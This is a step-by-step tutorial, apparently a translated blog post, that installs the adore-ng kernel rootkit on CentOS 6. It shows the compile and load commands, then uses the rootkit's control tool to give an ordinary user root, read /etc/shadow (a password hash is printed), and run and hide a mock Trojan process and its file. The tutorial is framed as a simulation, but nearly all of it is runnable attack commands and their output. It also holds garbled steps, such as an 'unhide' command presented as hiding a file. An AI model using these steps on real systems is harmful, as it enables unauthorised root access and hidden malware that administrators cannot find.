Rootkit is a kind of special malicious software. Its function is to hide the information of itself and specified files, processes and network links on the installation target. What is more common is that rootkit is generally used in combination with Trojans, backdoors and other malicious programs.
In our life, there is an essential character in spy films, which we often watch. Its duty is: good camouflage makes the opponent unaware of this for a long time; he wins the trust of the enemy and therefore holds the important position, which enables him to continuously obtain important information and use its unique channel to transmit it back.
And what we're going to learn in simulation today is one of the rootkits similar to it: adore ng
Environment: Centos 6
Two resources needed here (downloadable):
Install adore ng
Installation dependency: kernel-devel-2.6
[root@Fp-01 ~]# yum -y install kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm Loaded plugins: fastestmirror, security Setting up Install Process ...... Installed: kernel-devel.x86_64 0:2.6.32-754.27.1.el6 Complete!
Extract and install adore ng
[root@Fp-01 ~]# unzip adore-ng-master.zip [root@Fp-01 ~]# cd adore-ng-master [root@Fp-01 adore-ng-master]# ll -rw-r--r--. 1 root root 1143 Dec 30 2015 Makefile # There is already a makefile file. You can compile it directly with make-j 4 [root@Fp-01 adore-ng-master]# make -j 4
Loading module
[root@Fp-01 adore-ng-master]# insmod adore-ng.ko
view help
[root@Fp-01 adore-ng-master]# ./ava I print info (secret UID etc) h hide file # Hidden files u unhide file # Unhide file r execute as root # Execute as root R remove PID forever # Permanently delete PID U uninstall adore # Uninstall adore i make PID invisible # Hidden PID v make PID visible # Unhide PID
Common user is entitled to root
Add an ordinary user for a test
[root@Fp-01 ~]# useradd tom [root@Fp-01 ~]# echo "123456" | passwd --stdin tom Changing password for user tom. passwd: all authentication tokens updated successfully.
Copy adore ng to / tmp, because the user cannot enter the root directory after switching. cp -r: recursive copy
[root@Fp-01 ~]# cp -r adore-ng-master /tmp/
Switch users and log in to the server with tom user
[root@Fp-01 ~]# ssh [email protected] Are you sure you want to continue connecting (yes/no)? yes [email protected]'s password: [tom@Fp-01 ~]$ whoami tom
Test, edit / etc/shadow
[tom@Fp-01 ~]$ vim /etc/shadow ...... "/etc/shadow" [Permission Denied]
You can see that the permission is denied. At this time, you need to use ava to withdraw the right
[tom@Fp-01 ~]$ /tmp/adore-ng-master/ava r vim /etc/shadow 56,501,501,56 Adore 1.56 installed. Good luck. root:$6$tQrXvHNXMxM6eTuN$WJWqoN5bYKuy/PVxpVeWYLCCZ32OCur1rjHIvHOOytjLPPxRMV3jRB6IbENgA2ZBDWI0cwEOTBSwVnmmQlyT7.:18172:0:99999:7::: bin:*:15980:0:99999:7::: daemon:*:15980:0:99999:7::: adm:*:15980:0:99999:7::: ......
View the process on another terminal, and the user identity is root, indicating that the right is raised successfully
[root@Fp-01 ~]# ps -ef |grep /etc/shadow root 32703 30867 0 12:03 pts/3 00:00:00 vim /etc/shadow root 32727 32667 0 12:03 pts/4 00:00:00 grep /etc/shadow
Hide Trojan process
Simulate editing a Trojan
[tom@Fp-01 opt]$ /tmp/adore-ng-master/ava r mkdir script 56,501,501,56 Adore 1.56 installed. Good luck. [tom@Fp-01 opt]$ ll total 4 drwxrwxr-x. 2 root root 4096 Feb 13 12:09 script [tom@Fp-01 script]$ /tmp/adore-ng-master/ava r vim a.sh 56,500,500,56 Adore 1.56 installed. Good luck. #!/bin/bash while : do echo `This is the virus` >> date.txt sleep 1 done
Simple simulation Trojan program, output "this is virus body", plus execution permission, run in the background
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r chmod +x a.sh 56,501,501,56 Adore 1.56 installed. Good luck. [tom@Fp-01 script]$ /tmp/adore-ng-master/ava r ./a.sh & [1] 33987 [tom@Fp-01 script]$ 56,501,501,56 Adore 1.56 installed. Good luck.
Check the process first, and pass the process number
[tom@Fp-01 script]$ ps -ef |grep 33987 root 33987 30867 0 12:14 pts/3 00:00:00 /bin/bash ./a.sh root 34137 33987 0 12:14 pts/3 00:00:00 sleep 1 tom 34139 30867 0 12:14 pts/3 00:00:00 grep 33987
As you can see, next, simulate the hacker hiding process
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava i 33987 56,501,501,56 Adore 1.56 installed. Good luck. Made PID 33987 invisible.
Hide success. At this time, we will check the process and find that the process has been hidden
[tom@Fp-01 script]$ ps -ef |grep 33987 tom 34139 30867 0 12:14 pts/3 00:00:00 grep 33987
Big move: hide files
First, check the file information in the / opt directory
[tom@Fp-01 ~]$ ll /opt/ total 4 drwxrwxr-x. 2 root root 4096 Feb 13 12:14 script [tom@Fp-01 ~]$ ll /opt/script/ total 32 -rwxrwxr-x. 1 root root 77 Feb 13 12:13 a.sh -rw-rw-r--. 1 root root 24737 Feb 13 12:24 date.txt [tom@Fp-01 ~]$ tree /opt/ /opt/ └── script ├── a.sh └── date.txt
We simulate hiding date.txt
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava u date.txt 56,500,500,56 Adore 1.56 installed. Good luck. File 'date.txt' is now visible.
At this time, go to check and find that the file has not been found
[root@Fp-01 script]# tree /opt/ /opt/ └── script └── a.sh [root@Fp-01 ~]# ll /opt/script/ total 48 -rwxrwxr-x. 1 root root 77 Feb 13 12:13 a.sh
Propose root permission – > Hide parent process – > parent process start child process (virus) – > Hide Folder
In the end, it's a Trojan virus, which is hard to find by the system administrator